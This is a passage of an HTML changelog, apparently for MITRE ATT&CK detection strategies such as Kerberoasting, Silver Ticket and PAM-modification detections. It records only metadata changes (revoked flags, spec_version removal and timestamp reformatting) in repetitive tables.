collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0241] Detect Forged Kerberos Silver Tickets (T1558.002)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0288] Detect Gatekeeper Bypass via Quarantine Flag and Trust Control Manipulation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0293] Detect Hybrid Identity Authentication Process Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0060] Detect Ingress Tool Transfers via Behavioral Chain</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0157] Detect Kerberoasting Attempts (T1558.003)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0024] Detect Kerberos Ccache File Theft or Abuse (T1558.005)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0522] Detect Kerberos Ticket Theft or Forgery (T1558)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0462] Detect LLMNR/NBT-NS Poisoning and SMB Relay on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0207] Detect LSA Authentication Package Persistence via Registry and LSASS DLL Load</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0047] Detect Local Email Collection via Outlook Data File Access and Command Line Tooling</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0072] Detect Logon Script Modifications and Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0190] Detect MFA Modification or Disabling Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0454] Detect Malicious Modification of Pluggable Authentication Modules (PAM)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0472] Detect Malicious Password Filter DLL Registration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0257] Detect Mark-of-the-Web (MOTW) Bypass via Container and Disk Image Files</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0589] Detect Modification of Authentication Process via Reversible Encryption</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX 